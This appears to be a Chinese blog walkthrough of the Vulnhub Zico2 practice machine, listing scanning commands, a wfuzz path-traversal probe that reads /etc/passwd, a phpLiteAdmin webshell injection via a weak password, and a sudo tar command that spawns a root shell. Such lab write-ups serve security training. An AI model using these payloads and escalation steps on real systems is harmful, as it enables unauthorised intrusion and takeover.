Vulnhub:Zico2靶机

已于 2023-06-07 23:41:59 修改
阅读量165 收藏 1
点赞数
文章标签: 安全 web安全 网络安全
于 2023-03-25 15:31:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/129767648
版权

kali:192.168.111.111

靶机:192.168.111.241

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.241

目录爆破

feroxbuster -k -d 1 --url http://192.168.111.241/ -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1

view.php测试出文件包含

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.241/view.php?FUZZ=../../../../../../../../etc/passwd

dbadmin目录存在phpliteadmin

搜索该cms,发现该版本存在代码注入

searchsploit phpLiteAdmin

利用方法:创建数据库,数据库中表的字段写入一句话木马

漏洞利用

通过弱口令admin进入phpliteadmin后台,写入一句话

之后通过文件包含执行命令

提权

在/home/zico/wordpress/wp-config.php发现zico用户的密码

zico的sudo权限

提权方法:tar | GTFOBins

提升为root

sudo -u root tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

flag

ctostm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
入门靶机渗透zico2
Yaphst的博客
03-08 5961
靶场介绍 靶机下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后配置网卡,确保与自己的攻击机在同一网段,然后开启虚拟机。 Zico 正在尝试建立他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。 在尝试了一些流行的CMS之后,他决定建立自己的。 这是个好主意吗? 目标:拿到root权限,获取flag 信息收集 打开kali,查看kali的IP地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.134是靶机
zico2靶机
薛定谔嘚喵博客
03-19 364
文件包含,远程php代码执行漏洞,一句话木马
vulnhub渗透系列之zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2164
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Vulnhub靶场渗透-zico2
paidx0
10-01 1223
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
Vulnhub靶机zico2渗透
xingjinhao123的博客
02-27 339
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/ 目标是获取root的目录下的flag,难度是中级 运行环境: 靶机:网络设为NAT模式,IP地址为:192.168.174.133 攻击机:同网段下的kali Linux,IP地址为:192.168.174.128 运行靶机 开始渗透 获取IP地址 扫描端口 访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含 使用工具扫描发现确实存在目录遍历的漏洞,并
Zico-Shop.xmind
11-25
Zico-Shop.xmind
Acme-2zicon:Acme-2zicon 的只读发布历史
07-02
名称Acme::2zicon - 这是新的 $module概要 use Acme::2zicon;my $nizicon = Acme::2zicon->new;# retrieve the members on their activitiesmy @members = $nizicon->members;...Creates and returns a new Acme::2zico
凸优化Convex Optimization Overview Zico Kolter (updated by Honglak Lee)2008
04-14
凸优化比较权威的书籍,里面详细讲述了凸优化的每个理论以及应用
学习渗透日记6 靶机zico2实战
qq_56902810的博客
05-02 258
zico2靶机实战全过程
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3186
Vulnhub-Zico2靶机实战
Vulnhub靶机渗透zico2
realmels的博客
07-04 601
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件上传绕过.
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 675
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
【甄选靶场Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
人间体佐菲的博客
10-01 768
【甄选靶场Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权) 信息安全网络安全渗透测试
kali渗透综合靶机(五)--zico2靶机
W小哥
03-10 1333
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、node1靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
vulnhub/zico2
最新发布
qq_45230030的博客
04-23 428
下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
zico2靶机练习
weixin_71090536的博客
08-04 270
下方实操中,使用到 攻击机 Kali 和 靶机 zico2两台机器均开启 NAT 模式,比较方便快速扫描。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值